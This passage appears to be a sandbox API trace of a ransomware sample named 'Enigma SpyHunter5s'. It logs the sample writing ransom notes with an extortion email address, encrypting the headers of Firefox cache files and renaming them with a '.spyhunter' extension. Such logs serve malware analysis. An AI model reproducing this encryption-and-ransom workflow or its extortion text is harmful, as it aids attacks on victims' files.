lpMem=0x2fc2918 | out: hHeap=0x2c0000) returned 1 [0155.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.151] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.152] WriteFile (in: hFile=0xb0, lpBuffer=0x57eb8f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ecb8, lpOverlapped=0x0 | out: lpBuffer=0x57eb8f*, lpNumberOfBytesWritten=0x57ecb8*=0x127, lpOverlapped=0x0) returned 1 [0155.152] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.152] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ecb8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ecb8*=0x2ac, lpOverlapped=0x0) returned 1 [0155.152] CloseHandle (hObject=0xb0) returned 1 [0155.153] GetProcessHeap () returned 0x2c0000 [0155.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc27e0 | out: hHeap=0x2c0000) returned 1 [0155.153] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec58 | out: pbBuffer=0x57ec58) returned 1 [0155.153] GetProcessHeap () returned 0x2c0000 [0155.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0155.153] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec50*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec50*=0x30) returned 1 [0155.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.162] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01") returned 109 [0155.162] StrStrW (lpFirst="9DCB7d01", lpSrch=".txt") returned 0x0 [0155.162] GetProcessHeap () returned 0x2c0000 [0155.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0155.163] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ec14*=0x2800, lpOverlapped=0x0) returned 1 [0155.242] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.242] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ec14*=0x2800, lpOverlapped=0x0) returned 1 [0155.243] GetProcessHeap () returned 0x2c0000 [0155.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0155.243] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.243] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec14, lpOverlapped=0x0 | out: lpBuffer=0x57ec54*, lpNumberOfBytesWritten=0x57ec14*=0x4, lpOverlapped=0x0) returned 1 [0155.243] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec14, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec14*=0x30, lpOverlapped=0x0) returned 1 [0155.244] CloseHandle (hObject=0xb0) returned 1 [0155.244] GetProcessHeap () returned 0x2c0000 [0155.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.244] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01.spyhunter") returned 119 [0155.244] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01.spyhunter")) returned 1 [0155.245] GetProcessHeap () returned 0x2c0000 [0155.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.245] GetProcessHeap () returned 0x2c0000 [0155.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0155.245] GetProcessHeap () returned 0x2c0000 [0155.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbd2d0 | out: hHeap=0x2c0000) returned 1 [0155.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.246] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.246] WriteFile (in: hFile=0xb0, lpBuffer=0x57eb87*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ecb0, lpOverlapped=0x0 | out: lpBuffer=0x57eb87*, lpNumberOfBytesWritten=0x57ecb0*=0x127, lpOverlapped=0x0) returned 1 [0155.246] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.246] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ecb0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ecb0*=0x2ac, lpOverlapped=0x0) returned 1 [0155.247] CloseHandle (hObject=0xb0) returned 1 [0155.247] GetProcessHeap () returned 0x2c0000 [0155.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc21c8 | out: hHeap=0x2c0000) returned 1 [0155.247] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec50 | out: pbBuffer=0x57ec50) returned 1 [0155.247] GetProcessHeap () returned 0x2c0000 [0155.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0155.247] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec48*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec48*=0x30) returned 1 [0155.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.248] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01") returned 109 [0155.248] StrStrW (lpFirst="28E95d01", lpSrch=".txt") returned 0x0 [0155.248] GetProcessHeap () returned 0x2c0000 [0155.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0155.249] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ec0c*=0x2800, lpOverlapped=0x0) returned 1 [0155.308] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.308] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ec0c*=0x2800, lpOverlapped=0x0) returned 1 [0155.309] GetProcessHeap () returned 0x2c0000 [0155.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0155.309] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.309] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec0c, lpOverlapped=0x0 | out: lpBuffer=0x57ec4c*, lpNumberOfBytesWritten=0x57ec0c*=0x4, lpOverlapped=0x0) returned 1 [0155.569] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec0c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec0c*=0x30, lpOverlapped=0x0) returned 1 [0155.569] CloseHandle (hObject=0xb0) returned 1 [0155.571] GetProcessHeap () returned 0x2c0000 [0155.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.571] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01.spyhunter") returned 119 [0155.571] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01.spyhunter")) returned 1 [0155.572] GetProcessHeap () returned 0x2c0000 [0155.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.573] GetProcessHeap () returned 0x2c0000 [0155.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0155.573] GetProcessHeap () returned 0x2c0000 [0155.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbd080 | out: hHeap=0x2c0000) returned 1 [0155.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\2\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.574] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.574] WriteFile (in: hFile=0xb0, lpBuffer=0x57eb7f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eca8, lpOverlapped=0x0 | out: lpBuffer=0x57eb7f*, lpNumberOfBytesWritten=0x57eca8*=0x127, lpOverlapped=0x0) returned 1 [0155.574] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.574] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eca8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eca8*=0x2ac, lpOverlapped=0x0) returned 1 [0155.575] CloseHandle (hObject=0xb0) returned 1 [0155.575] GetProcessHeap () returned 0x2c0000 [0155.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f486c0 | out: hHeap=0x2c0000) returned 1 [0155.575] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.575] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.575] WriteFile (in: hFile=0xb0, lpBuffer=0x57eb7b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eca4, lpOverlapped=0x0 | out: lpBuffer=0x57eb7b*, lpNumberOfBytesWritten=0x57eca4*=0x127, lpOverlapped=0x0) returned 1 [0155.576] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.576] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eca4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eca4*=0x2ac, lpOverlapped=0x0) returned 1 [0155.576] CloseHandle (hObject=0xb0) returned 1 [0155.576] GetProcessHeap () returned 0x2c0000 [0155.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f48588 | out: hHeap=0x2c0000) returned 1 [0155.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.577] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.577] WriteFile (in: hFile=0xb0, lpBuffer=0x57eb77*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eca0, lpOverlapped=0x0 | out: lpBuffer=0x57eb77*, lpNumberOfBytesWritten=0x57eca0*=0x127, lpOverlapped=0x0) returned 1 [0155.578] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.578] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eca0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eca0*=0x2ac, lpOverlapped=0x0) returned 1 [0155.578] CloseHandle (hObject=0xb0) returned 1 [0155.578] GetProcessHeap () returned 0x2c0000 [0155.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f48450 | out: hHeap=0x2c0000) returned 1 [0155.578] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec40 | out: pbBuffer=0x57ec40) returned 1 [0155.578] GetProcessHeap () returned 0x2c0000 [0155.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0155.578] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec38*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec38*=0x30) returned 1 [0155.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.579] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01") returned 109 [0155.579] StrStrW (lpFirst="CBD4Dd01", lpSrch=".txt") returned 0x0 [0155.579] GetProcessHeap () returned 0x2c0000 [0155.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0155.579] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebfc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ebfc*=0x2800, lpOverlapped=0x0) returned 1 [0155.580] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.581] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ebfc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ebfc*=0x2800, lpOverlapped=0x0) returned 1 [0155.581] GetProcessHeap () returned 0x2c0000 [0155.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0155.581] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.581] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebfc, lpOverlapped=0x0 | out: lpBuffer=0x57ec3c*, lpNumberOfBytesWritten=0x57ebfc*=0x4, lpOverlapped=0x0) returned 1 [0155.582] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebfc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ebfc*=0x30, lpOverlapped=0x0) returned 1 [0155.582] CloseHandle (hObject=0xb0) returned 1 [0155.582] GetProcessHeap () returned 0x2c0000 [0155.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.582] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: 